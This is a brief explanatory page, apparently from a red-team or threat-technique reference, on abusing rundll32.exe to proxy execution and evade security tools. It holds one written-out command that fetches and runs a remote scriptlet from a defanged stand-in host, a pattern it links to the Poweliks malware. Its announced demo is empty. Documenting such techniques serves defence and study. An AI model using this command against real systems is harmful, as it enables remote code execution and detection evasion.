Rundll32

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allow lists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.

Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this:

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks.

Example

The popular rundll32 this utility is well known for execution and Defense Evasion, the binary is proxy aware as well and can execute from remote hosts UNC Paths or HTTP paths.

The following Demo is a sample of just executing calc on the localhost

Demo-Rundll32:

Last updated